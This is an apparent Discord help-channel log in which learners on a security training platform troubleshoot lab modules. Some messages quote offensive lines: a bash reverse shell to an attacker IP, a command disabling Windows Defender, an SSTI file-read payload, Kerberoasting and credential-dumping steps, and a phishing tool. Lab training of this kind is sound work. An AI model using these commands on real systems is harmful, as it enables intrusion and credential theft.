#modules

1 messages · Page 296 of 1

brave field
#

Oh ok.

formal sand
shut vapor
#

Fellows: crackmapexec or netexec?

fathom pendant
#

And netexec is the fork of it anyway

forest tree
#

fuff ports

rustic sage
#

learing process finish 😄

#

I saw very impressive things, are there more resources on these subjects?

hidden hemlock
#

please someone can help me with this error

storm elk
quasi gust
#

Have anyone open Dm to discuss about SA in Introduction Evasion AV module ?

sonic plume
#

Hi could someone help me with "Subdomain Bruteforcing question"? (module: INFORMATION GATHERING - WEB EDITION). Tried many different things but none of them seems to work.

spark spruce
#

Just try changing the wordlists
Maybe

sonic plume
#

nvm, got it

fervent vector
#

why i cant send messages to general?

hidden hemlock
manic pawn
#

i think the detections were like maximum 10 since every web refresh added 2 detections

shut vapor
#

Password Attack Module :: Network Services Section
Hydra: doesn't work well for attacking SMB or is it just me / the HTB system / I'm missing a trick? I got definite results using NetExec / CME / and MSF.

shut vapor
fervent vector
#

Identification error: please contact an online Moderator or Administrator for help.

shut vapor
fervent vector
#

how can I find admin?

shut vapor
dim wolf
manic pawn
dim wolf
shut vapor
shut vapor
manic pawn
#

Hmmm, somehow the port 53 opened itself? Until 3 minutes ago it was filtrated and I couldn't access it in any way and now I suddenly can, does anyone have an explanation?

opal haven
#

Day 2 of hitting Flag 1 , inorder of flag 1 , i think i discovered a lot of info required for other few flags maybe , but still im stuck at flag 1 still , this is clearly making me feel frustrated at this point guys as I'm running out of ideas at this point.

honest gate
#

Hello there, I'm really stuck in the malware analysis module on the orange.exe registry key. I've identified the function, and I'm 99% sure I've identified the path but I have a formatting error or something when pasting in the registry key. Can anyone give me a hint please?

Edit: Solved... I was pasting it in with the double slashes, my brain is fried

hidden steppe
#

Is anyone able to help me on this weekend?
It's kinda silly but I can't ssh into this target.
In the security monitoring & SIEM fundamentals module
On the skills assesment for this module, the module doesn't give a username or anything so I just type ssh then the target IP address and it says:

ssh: Could not resolve hostname 10.129.142.91:5601: Name or service not known

We are pretending to be an admin here so I tried admin@ but that doesn't work either

charred light
charred light
#

It returns
Matching Defaults entries for user1 on
ng-1399082-gettingstartedprivesc-ip3tc-5bfd7469b9-78zfc:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User user1 may run the following commands on
ng-1399082-gettingstartedprivesc-ip3tc-5bfd7469b9-78zfc:
(user2 : user2) NOPASSWD: /bin/bash

shut vapor
# manic pawn Alright, thanks!

If you spawn the box and load the status page, the counter seems to start at 50/100 detections. If you know services are on there already you can get the answer without incrementing it at all. Like I remember, refreshing that status page seems to make the counter increase more than the scanning itself. And your observation that there isn't any firewall attached to the counter is accurate -- being blocked doesn't actually seem to stop any communication w/ the system.

manic pawn
manic pawn
storm elk
wraith pelican
crisp phoenix
#

Anyone have problems with virtualization on the windows 11 enterprise evaluation vm in the setting up module?

manic pawn
storm elk
#

Awesome, I haven’t done that one yet, so can’t be of any help 🙂

hidden steppe
hidden steppe
#

but I tried the ssh ipaddress:5601

crisp phoenix
#

I cant find virtualization in BIOS on this windows 11 enterprise evaluation vm, anyone dealt with this?

wraith pelican
hidden steppe
#

hahaha

#

thank you quiet

#

looks like slowmode is enabled in my brain too today

wraith pelican
shut vapor
limpid hemlock
#

Hey in the active directory section prinstspoofer actualy what does that tool do ?

#

In terms of seimpersonation

crisp phoenix
dire bolt
#

Hello guys :-

Am stuck on Firewall and IDS/IPS Evasion - Medium Lab Exercise.

Am trying to get the DNS sever version and I have really ran out of ideas. I tried all the steps on the DNS Proxying and really have failed to retrieve the version even with netcat.

manic pawn
manic pawn
wraith pelican
crisp phoenix
shut vapor
crisp phoenix
#

Its suggesting that I build this and use it as a penetration testing host.

wraith pelican
crisp phoenix
#

Oh shit

#

Hmm nested vm is enable in virtualbox too, thought that was going to be it

wraith pelican
civic hamlet
#

Completed the Linux fundamentals module. I’ve been using windows all my life (nothing cybsec related), should I skip the windows fundamentals module?

wraith pelican
crisp phoenix
crisp phoenix
#

I'm really at my wits end with it right now

wraith pelican
azure fog
#

Hi everyone,

I'm currently in the Advanced Deserealization module and struggling with code understanding and exploitation because I never used C# before. I finished the Introduction to C# module but I still feel a big gap. Maybe someone can recommend resources to learn C#? Especially in the context of web apps.

Appreciate any advice!

limpid hemlock
#

Hey im trying to solve Ad skill assesment part 2 and im trying to solve SUBMIT THE CONTENTS OF FLAG ON ADMINISTRATOR DESKTOP ON MS01 HOST

#

I found a set of creds with crackmap dumping lsa with the user administratot and a password i set

acoustic owl
azure fog
acoustic owl
regal sigil
#

In the password attacks module, in NTDS.dit section, they use a password list called /usr/share/wordlists/fasttrack.txt, but in my pwnbox there is no list as this

charred light
#

I can't establish a reverse shell. My machine runs nc -lvnp 1234 and the target bash -c 'bash -i >& /dev/tcp/10.10.14.110/1234 0>&1', just like the lesson told me. The target has no internet connection and I can only use the bash command. Why isn't it working?

craggy grove
#

I'm hard stuck on this module "Windows Event Logs and Finding Evil" if anyone is willing to help. I'm on #3 about finding the process that injected into the process that executed the unmanaged powershell

quasi wave
north bramble
#

why am I getting this error?

north bramble
north bramble
split glade
#

Windows Privilege Escalation Skills Assessment - Part I
Was there really a way to get the ||ldapadmin password|| before having a SYSTEM shell? It seems that most people do it in that order, but the question is asked before telling us to escalade privileges. I just want to know if I'm chasing the impossible
Edit: I am

vague tundra
#

Can I use the modules pwn box to solve machines ?

quasi wave
#

hi there's an issue with the reverse shell section of shells and payloads module. This command to disable Windows AV doesn't work even if you copy and paste it into the Windows target box:

Set-MpPreference -DisableRealtimeMonitoring $true```
#

it gives me an error that says:

PS C:\Users\htb-student> Set-MpPreference -DisableRealtimeMonitoring $true                                              Set-MpPreference : You don't have enough permissions to perform the requested operation.                                At line:1 char:1                                                                                                        + Set-MpPreference -DisableRealtimeMonitoring $true                                                                     + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                                         + CategoryInfo          : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Set-MpPreference],      CimException                                                                                                             + FullyQualifiedErrorId : HRESULT 0xc0000142,Set-MpPreference```
#

the section says to use that exact command

#

this is on the target box

#

I am able to RDP in successfully but once I RDP in that command won't work. how do I fix this?

vague osprey
#

This VM is so slow

#

Getting this error when trying to VPN into target system -
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-unit-files ===
Authentication is required to manage system service or unit files.
Multiple identities can be used for authentication:

  1. mrb3n
  2. cry0l1t3
    Choose identity to authenticate as (1-2): 1
    Password:
    polkit-agent-helper-1: pam_authenticate failed: Authentication failure
    ==== AUTHENTICATION FAILED ===
    Failed to enable unit: Access denied
#

I've restarted and log out of the system several times/

#

I just completely logged out of Hack the Box. I guess I'll try again later.

zealous rune
vague coral
#

Hi

#

Task scheduling Question what is the type of the service of the “dconf.service”?

#

answer notify I'm writing this answer, but I don't accept mistakes

#

Can you help me if you don't mind?

patent berry
#
[23:18:39:600] [49475:49476] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[23:18:39:600] [49475:49476] [WARN][com.freerdp.crypto] - CN = WS01
[23:18:41:108] [49475:49476] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[23:18:41:108] [49475:49476] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[23:18:41:108] [49475:49476] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[23:18:41:108] [49475:49476] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

I'm doing windows funds room but when trying to rdp into the machine I get a cert error any ideas?

shut vapor
tranquil crystal
#

Brute forcing with /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:
Brute forcing with /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt:
so far. Ther are like a dozen different wordlists though. Hmm.

I should combine all the domain wordlists into one and remove duplicates, master list, and sort it. Might help.

patent berry
#

I just ignored the cert tho ans it worked ty

shut vapor
ancient minnow
#

Hey! In the "Intro to whitebox pentesting" Skill assessment, is there a way to get /flag.txt without doing it via ||sleep timers||?

tranquil crystal
#

Could someone give me a hint on which wordlist to use? I've tried a few so far and no luck...

fathom pendant
#

Also subdomain of subdomain

fathom pendant
tranquil crystal
#

I will try that list thanks. I'll also try to include the module name and section

#

https://academy.hackthebox.com/module/112/section/1069 in this link, where can I find the module name and section name? I don't see them. Section name is Foot printing? what is the module? I know it's module #3 of the pentest job role path, but I don't know the name. This is just really extra work. It's much easier for someone to just click the link and look at the question

#

Nope. Foot printing is the module name.

#

Section is DNS

#

It's extra steps to look this information up. How necessary is it to provide module name and section name? I thought the link would be more than enough for someone to directly look at what is being asked about. I don't see it necessary to look up the module name and provide it. If you click the link, you can see the material and the question on which I'm stuck. That's the fastest way to my understanding. Thank you.

#

Thanks for the tip. Found it very fast by using that wordlist.

#

Otherwise I'd have to go through each list one by one and that would have taken a very long time. Much appreciated.

crisp phoenix
tranquil crystal
#

Intersting, sir

#

When I click the link I see this:

#

I see. So we see different things?

crisp phoenix
#

Well I can see why it would be useful to include some extra information

tranquil crystal
#

Yeah I can see now

crisp phoenix
tranquil crystal
#

If the link I share doesn't show you the same thing as I see, then yeah, then you need more info

#

It's because maybe you don't have academy and you have to be logged in? Just a guess

crisp phoenix
#

Nah Im logged in, I havent started that module yet though which could be why

tranquil crystal
#

Hmm.

crisp phoenix
#

I have a student account as well

tranquil crystal
#

I don't understand, I'll include the name and section name, sure

proper night
#

hii

tranquil crystal
#

Well if it takes you to the module page, you only need the section name from me then

tranquil crystal
#

That I can provide, np

#

Looking up the module name is not so easy, you have to leave the page, open the modules link, the click current in progress module to see the module name.

#

So yeah, I can totally provide the section name with a link, np. Thanks.

#

I didn't realize we saw different things from the same URI

crisp phoenix
tranquil crystal
#

Cheers

dim wolf
dreamy grotto
#

Is there an extra step to get internet connectivity within pwnbox? Im working through the first module "Intro to academy", and cannot visit the target system using Firefox. The connection times out.

dreamy grotto
light yarrow
#

Yooo

dreamy grotto
vapid thistle
#

Hello everyone. Ran into an issue today while doing :https://academy.hackthebox.com/module/19/section/118
When I run the solution given by the "Show solution", it works in the PwnBox but not from my PC (Parrot OS). I have downloaded the VPN file again just to be sure but without any success. Any reason for that or hint about what I should do? It is not the first time it happened to me.
I also check the nmap versions, they are exactly the same.

warped thunder
#

Having trouble on Preignition
I was able to install go and pull up the the list of switches under the help command. However, I keep getting errors when running the sudo gobuster dir -w /usr/share/wordlists/dirb/common.txt -u {target ip}

vapid thistle
dreamy grotto
vapid thistle
warped thunder
#

Hello?

acoustic owl
vapid thistle
# acoustic owl Do you get an error message?

Spoiler alert : For context, the first time I tried the Hard lab, the nmap and netcat command were working as expected and I got the flag. Then when I tried on my PC it failed. I then found out that for some reason i was scanning different PC (VPN issue maybe?).
I then changed the VPN and location so my PC and the PWNBOX(SG server) were both on the same VPN (US Academy 6). Re-downloaded the file for my PC. The nmap scan finally gave the expected result for both of them, but I was not able to get the flag using netcat like before (or the solution given in the "show solution"). On the Pwnbox I had a request timeout and on my pc:
sudo nc -nv -p 53 10.129.184.246 53
(UNKNOWN) [10.129.184.246] 53 (domain) : Connection refused

dim wolf
dreamy grotto
vapid thistle
acoustic owl
vapid thistle
acoustic owl
dreamy grotto
#

New to HTB, only have done a few in "Starting point". I had difficulty connecting through TCP. UDP worked though. Anyone know why, or if this is a common issue? Connected using OpenVPN in a Kali VM on my home machine.

tranquil crystal
#

Hello folks. I'm on this: https://academy.hackthebox.com/module/112/section/1072, FOOT PRINTING, SMTP, Last Question:

I'm using msfconsole to do smtp enum on a username wordlist, but what other wordlists can I use for usernames? The hint says:

On systems usernames are often named after the employee's name. We recommend to use the Footprinting-wordlist provided as resource. Remember that some SMTP servers have higher response times.

Where can I find this footprinting wordlist on Kali linux? Thanks.

acoustic owl
tranquil crystal
#

So I should use Parrot OS? The list is in there? I can't see any link for any list in the module

acoustic owl
vapid thistle
tranquil crystal
#

Oh ok

#

Thanks very much!

acoustic owl
vapid thistle
pastel pier
#

I'm having a ROUGH time with ACTIVE DIRECTORY ENUMERATION & ATTACKS:Kerberoasting - from Linux (https://academy.hackthebox.com/module/143/section/1274). It seems like th domain controller isn't running? I've tried restarting the server a couple of time. Also my SSH keeps dropping my connection every 30 seconds or so (both personal machine and pwnbox).

#
┌─[htb-student@ea-attack01]─[~]
└──╼ $GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request 
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

Password:
[-] [Errno 113] No route to host
┌─[htb-student@ea-attack01]─[~]
└──╼ $for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
64 bytes from 172.16.5.225: icmp_seq=1 ttl=64 time=0.067 ms
#

Any suggestions?

fathom pendant
#

It's literally at the top of the page

pastel pier
#

Huh yeah I see the current regoin I'm using is under high load, I'll give that a shot. But would that fix the domain controller issue?

fathom pendant
pastel pier
#

Hm that seems kind of counter intuitive 😅

fathom pendant
pastel pier
pastel pier
fathom pendant
hoary depot
north bramble
jade latch
#

my first juicypotato hit after 8 tries and it sends some weird data that kicks me out 💀

#

aight we good

grand loom
#

whats the difference between -sS scan and -sT - my confusion is that both send the same SYN flag and wait for a RST or SYN-ACK packet?

#

nevermind

#

-sS is half connection

#

closes the connection and doesnt allow full connection

full geyser
#

Yes I want to learn it

uneven oracle
full geyser
#

I'm starting to learn it
I'm a beginner
I'm just prioritising to learn these skills so that I can start my bug bounty journey asap

fathom pendant
eager ledge
#

Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: AD Enumeration & Attacks - Skills Assessment Part II

So far, I have managed to get credentials for m* domain account. This user has administrative rights over M* server. BloodHound shows that the user also belongs to Domain Admins group. However, when I execute whoami /all command, it doesn't show that the user belongs to Domain Admins. Furthermore, I have tried to do the following:

  1. DCSync using mimikatz => ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
  2. Add the user to A* group => Insufficient access rights to perform the operation
  3. Take NTDS.dit dump => cannot be found on \Windows\NTDS\NTDS.dit location, searched and found one on \Windows\WinSxS directory, but decrypting using secretsdump.py gives error
  4. Take LSASS dump => Only contains information about the same user and computer account(whose hash cannot be cracked)
  5. Checked for noPac, PrintNightmare, ASREPRoasting, PetitPotam
  6. I know the user C* that I need to get access to. But I am not sure how.
mint peak
#

Love solving skills assessments and then looking up a write up and finding out I did it a totally different way than normal kek

next bronze
#

also I'm pretty sure the machine account won't be in the DA group

quasi gust
tranquil crystal
shell glacier
#

Hi all, im stuck on the linux privilege escalation (environment enumeration), I know i need to sudo with lab_adm. HOWEVER i cant figure out how, i tried sudo -u lab_adm /bin/ncdu, but that give me permission denied, I tied sudo -l -u <command> nothing works permission denied. What am i supposed to do ? to get into the lab_adm accounts?, I tried sudo -i -u lab_adm <command> , and essentially any combination of sudo + switch + lab_adm you can think of. nothing is working. SO i HAVE TO be doing something wrong

narrow geyser
#

Hi I need help around "Exploiting SSTI - Twig". I get the answer through RCE. However the LFI part does not seem to work
payload name={{ '/flag.txt'|file_excerpt(1)}}

https://imgur.com/a/cRhFV0c (sorry for imgur link, somehow I can't upload an image)

pseudo kiln
#

anyone got a go to list for fuzzing file upload extension ? I know about those ones from seclists and payload all the things, but they seem incomplete, not fuzzing everything

eager ledge
robust quartz
#

in the "Intrusion Detection With Splunk (Real-world Scenario)" module, in question no 3. How do I identify a suspicious process that load clr.dll? In fact, there are many legitimate processes that load clr.dll, such as powershell.exe, etc.

@simple loom

warped thunder
#

@acoustic owl yes, I get an error message

simple loom
next bronze
tranquil crystal
#

https://academy.hackthebox.com/module/112/section/1073
Module: Footprinting
Section: IMAP/POP3

Last question: Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})

I've fetched the email, full with body, and I can't seem to find the flag anywhere. Could any give a hint on where I'm supposed to see the flag?

next bronze
#

yes kek

#

just dm

mint peak
#

Finally got everything done except AEN. Excited to go into it blind and see how good my notes are 😄

#

Which will likely turn into sadness real quick

tranquil crystal
#

I see two mailboxes. INBOX has nothing. the other inbox has 1 email. I fetch it, full with body, and I don't see flag. So I'm lost for right now.

robust quartz
wraith pelican
tranquil crystal
#

Oh. You don't just fetch it, you fetch with specific RFC paramter

#

I got it now. I saw some example of fetch with RFC822 and I tried that and was able to see email body finally

#

Thank you

gray jay
#

When running bruteforce methods on Academy, is there a wordlist one should use specifically. Like in Labs where there is set lists.

old oasis
stark lark
#

Introduction to Pivoting, Tunneling, and Port Forwarding
SOCKS5 Tunneling with Chisel

Should I try using another version of Chisel or try and install the dependencies?

next bronze
twin nacelle
#

YARA & Sigma for SOC Analysts - Skill assessment
The "C:\Rules\yara\seatbelt.yar" YARA rule aims to detect instances of the "Seatbelt.exe" .NET assembly on disk. Analyze both "C:\Rules\yara\seatbelt.yar" and "C:\Samples\YARASigma\Seatbelt.exe" and specify the appropriate string inside the "$class2" variable so that the rule successfully identifies "C:\Samples\YARASigma\Seatbelt.exe". Answer format: L________r

#

Does anyone know how to approach this question in the intended way

#

I have solved it simply using regex analysis of the strings output of the binary for strings that look like L________r which is probably not the intended way

#

I haven't found any other way to solve this

simple loom
stark lark
simple loom
next bronze
#

git is only valid for git related stuff

vague tundra
#

What web browser am I to be using here? (Shells & Payloads skills assessment)

next bronze
#

firefox in the terminal

vague tundra
formal nimbus
#

hello guys can i have some help for the module digital forensic practical scenario ?

civic badge
#

Good afternoon, looking for any pointers on the CrackMapExec skills assessment question 3. I've compromised the SQL Server entirely, dumped creds and tried to reuse the hashes (have been unable to crack them). I've run a couple of different scripts as an admin looking for interesting info with no joy on the SQL server. I've identified an Intern user from the SQL database and found a writable share on the DC and tried to see if I can get anyone to authenticate via a malicious file in the share (there doesn't seem to be any info in the share itself). Tried a few different ways to enumerate the DEV server with no joy. Haven't got anywhere with the CME modules looking for group managed passwords etc also. Starting to run out of ideas.

fathom pendant
wraith owl
#

Just a short feedback for devs - Rpivot (Pivoting, Tunneling, and Port Forwarding) depends on python2.7 and apparently it was removed from Parrot OS (?) - not available for install in PWNBox.

simple loom
#

Credits to whomever posted this, bc I got that on my notes a while ago hahaha

teal swan
#

Hi

acoustic owl
teal swan
#

Me try it over a month but Google is not answering

#

I know my gmail account old password anyone can help to get it's password 🔑

acoustic owl
teal swan
#

Me try to all but account is not recover

#

So I need a one cyber expert to recover it

acoustic owl
teal swan
#

But I need you know any person

teal swan
#

This is also done

#

Me post on community but Google is not answering

storm elk
#

Be patient or take your loss. We can not help you as that would be illegal.

gilded radish
#

module: Information Gathering - Web Edition
section: Web Archives

How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234.

Where can I track how many are there labs?
I mean at all, I know how to use web archive, but I never seen htb post a number of labs

acoustic owl
tranquil crystal
# fathom pendant Are you doing `1 fetch 1 all`? If so, that's why. You need to fetch the body[]

||a fetch 1 RFC822|| It has to be this. I was doing a FETCH 1 ALL or a FETCH 1 BODY

||* a fetch 1 all
1 FETCH (FLAGS (\Seen) INTERNALDATE "08-Nov-2021 23:51:24 +0000" RFC822.SIZE 167 ENVELOPE ("Wed, 03 Nov 2021 16:13:27 +0200" "Flag" (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("Robin" NIL "robin" "inlanefreight.htb")) NIL NIL NIL NIL))
a OK Fetch completed (0.001 + 0.000 secs).
||

fathom pendant
#

It's why I explicitly put them there

#

body[] does the same thing

tranquil crystal
#

I see

stark lark
stark lark
next bronze
#

no compile it in your host

stark lark
#

oml.. my bad

vague tundra
shut vapor
vague tundra
late moth
#

the password attack module is taking me way longer than the 8 hours it mentions in the module description lol

forest gust
#

What i do wrong?

next bronze
#

also bruteforcing winrm is very inefficient, even if your lists are small it will still take forever

civic badge
next bronze
#

well do you have the lists?

#

also what module and section

gilded radish
#

"password.list" is just an example, you should you your own pass file

signal pagoda
#

Can anyone help me to install the vpn? i'm lost i just started today

gilded radish
#

openvpn is installed by default on kali

#

what do you use

forest gust
next bronze
#

yes so you'lll need a list before you can spray

#

it's just an example

forest gust
#

Okay, but then which sheet to take.

signal pagoda
vast thorn
#

so im doing the linux fundamentals, and im doing the first questions, and i feel a little lost, idk if theres something i missed, but the question is "What is the path to the htb-student's mail?" i figured it would be /var/log or /var/mail as the answer but there both wrong and im kinda just lost, didnt know if anyone could point in the right direction to go, i dont want the answer to it

gilded radish
#

usually cmd looks like
"sudo openvpn academy-regular.ovpn"

gilded radish
vast thorn
signal pagoda
next bronze
#

the terminal..

next bronze
steady dust
#

if you are using kali, there is no need to install openvpn. if you are using pwnbox, you don't need to connect to vpn.

#

if you are using kali, and want to connec to vpn, just use the command "sudo openvpn path/vpn_file.ovpn"

#

i think it worth to try first the linux fundamentals module

vast thorn
gilded radish
vast thorn
#

i dont think so either, but it is a very helpful

gilded radish
#

there is another answer on the forum

#

you should read again what is env

#

I believe it should be in the module

vast thorn
#

i even used env too and i had the answer in front of me at least 3 times im blind as a bat omg i feel embarrassed af ngl

#

well we live and we learn

gilded radish
#

it's okay

quasi jungle
#

Have been stuck on this
Can't enumerate the username at all via brute force or exploration.
Valid username filter "Invalid credentials."
Invalid username filter "Unknown username or password."
Used xato 10 million and names.txt both from SecLists.

Cookie's are PHPSESSID and aren't exploitable.

Profile.php can't be accessed by modifying the status code or anything.
And 2fa.php won't work with any registered user. Tried to brute force till 10k combinations with the current sessid of my registered user.
https://academy.hackthebox.com/module/80/section/848

split glade
#

Windows Privilege Escalation
Communication with Processes > Named Pipes
"From here, we could leverage these lax permissions to escalate privileges on the host to SYSTEM."
How? By using getsystem through a meterpreter shell? Did I miss a concrete example somewhere in the CPTS path?

spare fossil
#

Hello, i am running into an issue here, Module/hacking wordpress/skill assessment... I get the following, any help?

split glade
spare fossil
next bronze
spare fossil
next bronze
#

explore the site

next musk
#

I found a flag and some reason HTB is not accepting it

spare fossil
steady dust
#

or maybe the website is located on a subdomain 😉

spare fossil
steady dust
late moth
steady dust
steady dust
next musk
steady dust
#

check for spaces

next musk
#

No spaces

steady dust
#

if there are spaces before, or after, you will get that error

next musk
#

None before or after

next bronze
#

let's not just put flags here outright yeah, even if it's a tier 0 module

next musk
#

My bad

next bronze
#

that's not the right flag for that section

next musk
#

💀💀

#

Alright I’ll figure it out then

spare fossil
#

got it working now, thanks ! @next bronze @steady dust

next bronze
leaden light
#

Hi, I'm trying to resolve the question "How many total packages are installed on the target system?" in the "File Descriptors and Redirection" section from Linux Fundamentals module. I've tryied with use find command and searching some extensions (.deb, .dpkg) and other option, using "apt list --installed | wc -l" but i haven't obtain the correct answer. Some hints that it can redirect me? Thanks so much!

cloud plaza
#

Subject: Linux Fundamentals - The "Find Files and Directories"

Feedback:

  • Material covered has nothing little to do with the exercises presented to us
  • would be beneficial to see the format desired for question 1 " What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"

I have tried all conf files that I can determine work:

  • auto.conf
  • tristate.conf

Neither work and The "Show Solution" button does not work

If anyone has any suggestions please let me know

winged depot
winged depot
desert cypress
#

Hi, I need a little help to understand the csrf token theft in this module: Cross-Site Request Forgery (POST-based) (Session Security cours)
I don't understand how HTML injection is used to send the token to our server

civic badge
reef pecan
#

Hello Hackaz! I am in SQL modules: https://academy.hackthebox.com/module/33/section/194

The question I need help with: Try to log in as the user 'tom'. What is the flag value shown after you successfully log in?

It says I am logged as 'admin' which was demonstrated in the article, but I am supposed to be 'tom' and find a flag which doesn't appear to be in a source code or in the network tab.

thorny sluice
#

I'm having trouble getting my Noriben file to save on the malware analysis module

restive trail
reef pecan
thorny sluice
restive trail
reef pecan
#

Will try it again tomorrow, if I still don't get the flag, I'll open a chat.

restive trail
#

Hello, I need some help please on SERVER-SIDE ATTACKS module, Identifying SSRF, stuck on Exploit a SSRF vulnerability to identify an internal web application. I have no idea how they want me to identify an internal web application with SSRF.
https://academy.hackthebox.com/module/145/section/1295

manic pawn
#

I'm currently on domain information from footprinting and it's straight gibberish, I can't understand like anything at all, could someone help me by explaining the commands in this section? Thank you!

minor dome
#

In Information Gathering - Web Edition Creepy Crawlies, I need to identify the location where future reports will be stored but all that I am finding is this. While gives me a hint that something might be in the comments but it says to give the answer with the full domain. Any suggestions to finding more info through the reconspider?

ripe grail
#

Can anyone help me with lockphish in kali

#

There is a problem in direct link

#

I am not getting any direct link as output

#

I am not able to upload pic here so plz help me with this if anyone can

restive trail
minor dome
# restive trail those are what's showing in results.json?

It's what the module gave me .The domain its asking for me to do reconspider on is the same as the example. But when I download everything in the module and run the reconspider, it says permission denied and doesn't save anywhere. But running the same command with sudo says python3.pv doesnt exist.

sonic plume
#

footprint module: "What is the customized version of the SNMP server?" i've no idea what the answer format should be, any hints?

minor dome
restive trail
minor dome
civic badge
sonic plume
#

aaahhh thank you!

civic badge
restive trail
# minor dome yep

try pip3 install scrapy --break and then redownloading reconspider and unzipping it and see if that works

minor dome
#

there are no js files on the instance

restive trail
wraith pelican
#

That should work

minor dome
wraith pelican
#

Ow ok sorry I thought you had still issues with scrapy

#

You should run the script from a directory you can write in. You got permission error

minor dome
wraith pelican
#

I would use somewhere in my home folder and not run everything as root

minor dome
restive trail
#

just "cd "

minor dome
#

That worked, thanks!

grand loom
#

the one on the left is using HTB provided machine and 2nd on is the HTB VM on my VMware

#

dotn worry about the IP tho

#

just restarted it thats all

wet finch
#

What are the odds? I'm running LFI/Log Poisoning and someone is nmap scanning the box at the same time?

lol...

wraith pelican
#

You are trying to bypass firewall rules or IPS, I can’t remember, so if you change your IP your count with the firewall gets reset . With one you are blocked and not with the other.

grand loom
wraith pelican
#

Yes it should work, that or a new vpn connection file. In real life, you can’t respawn another instance so you would have to scan from another IP

wraith pelican
wet finch
#

Yup, so somehow connected to someone else's instance I suppose

ocean night
#

Is this an Academy module?

wet finch
#

yeah

ocean night
#

If so, it's not from a local IP, but rather it's routing through the cluster from the public IP / port IIRC

#

So probably just someone scanning the IP of the cluster

#

People scan shit 24/7

wet finch
#

Interesting - edit Yeah, I saw the 192.168 & figured it was a local scan

restive trail
#

So for Identifying SSRF in the SERVER-SIDE ATTACKS module, was ||using Local File Inclusion|| the intended way to get the flag? Only asking because the prompt is to "identify an internal web application"

grand loom
grand loom
#

got the same question as this, im banned before i get my full port scan done

fathom pendant
#

-sV does additional probing

#

As a note I never had to use -D

#

Also spoiler

#

The first screenshot has the flag

dapper moth
#

Has anyone finished the Windows Lateral Movement module? Got a question about a procedure that I might be making a stupid mistake

rustic sage
#

Module: metasploit
Section: Sessions and Jobs

Output claims system is appears to be vulnerable and injectable. But it does not do its process, i've refreshed the IP address, downloaded a new vpn config. Same issue

#

However, if i do use the HTB academy system it'll work but it's slow for me which i hate

grand loom
edgy gale
#

hello everyone how are you?

#

I'm facing an issue in ATTACKING WEB APPLICATIONS WITH FFUF
Page 9
Filtering Results

ocean bronze
#

Hello

#

I'm new here

#

I wanted to get help from #hack the box

edgy gale
ocean bronze
#

@edgy gale some hackers are threating me

edgy gale
edgy gale
#

🙂

#

goblin is here he will threat them 🙂

ocean bronze
#

They are saying that they will terminate my yt account they already hack my location and my jaaz account

ocean night
#

Ignore them.

#

Enable 2FA, update your password.

ocean bronze
#

I tried but the still

edgy gale
ocean night
#

Then you likely have something dodgy on your computer, and should reformat.

ocean bronze
#

@edgy gale yes they show me that I live in punjab

edgy gale
ocean bronze
#

Yes

edgy gale
#

ahh what proof they have shown?

ocean night
#

When you say hack your jaaz account, what do you mean.

ocean bronze
#

Jaaz is a bank account

edgy gale
ocean bronze
#

Yes

ocean night
#

Ok, can you recover it?

edgy gale
#

like our bank account it create on sim

edgy gale
ocean bronze
#

Yes I did it I recovered it

ocean night
#

Right

#

Change passwords, enable 2FA, reformat and ignore them.

#

Go to the police if you want, but unlikely they will do much.

civic hamlet
#

hackthebox tech support 👍

ocean bronze
#

Thank God my money was saved and I changed password

edgy gale
#

Zakora come in my dm i will help u.

ocean bronze
#

Really

edgy gale
edgy gale
civic hamlet
#

@young arrow Finished the linux fundamentals module, reccomend I skip to bash coding or do the windows fundamentls + windows cli modules

ocean night
#

Just follow the advice above

#

That's all you really need to do

ocean bronze
#

Ok

ocean night
#

No offense @edgy gale - but they've already been taken in by someone they don't know

#

The last thing we should do is encourage them to confide in someone else they don't know

ocean bronze
#

@edgy gale

edgy gale
dapper moth
#

Have been busting my head on a double hop, if anyone can give me a nudge I'd appreciate! It's on the WinRM section of Win Lateral Movement.
I can get in the Host, but not as the right account which should have the read permissions to the file I want.

grand loom
#

bro smh i ran the exact command yesterday and it worked

grand loom
#

so therefore we arnt banned

#

same thing with the -D RND

#

hides our ip

fathom pendant
#

RND includes your IP in the random genned list

grand loom
fathom pendant
fathom pendant
#

I got the answer without needing to spoof or rnd

#

Or need a vps

#

Just don't overthink it tbh

grand loom
fathom pendant
#

Read the documentation

#

On an rl engagement you'd likely limit your scan rate anyway

rustic sage
#

rl = reallife?

fathom pendant
#

Yes

grand loom
edgy gale
#

I'm facing an issue in ATTACKING WEB APPLICATIONS WITH FFUF
Page 9
Filtering Results

fathom pendant
fathom pendant
#

The simple thing is, are you filtering the result as described?

edgy gale
#

yeah

fathom pendant
#

Don't use the exact filter from the example

edgy gale
#

i'm using this

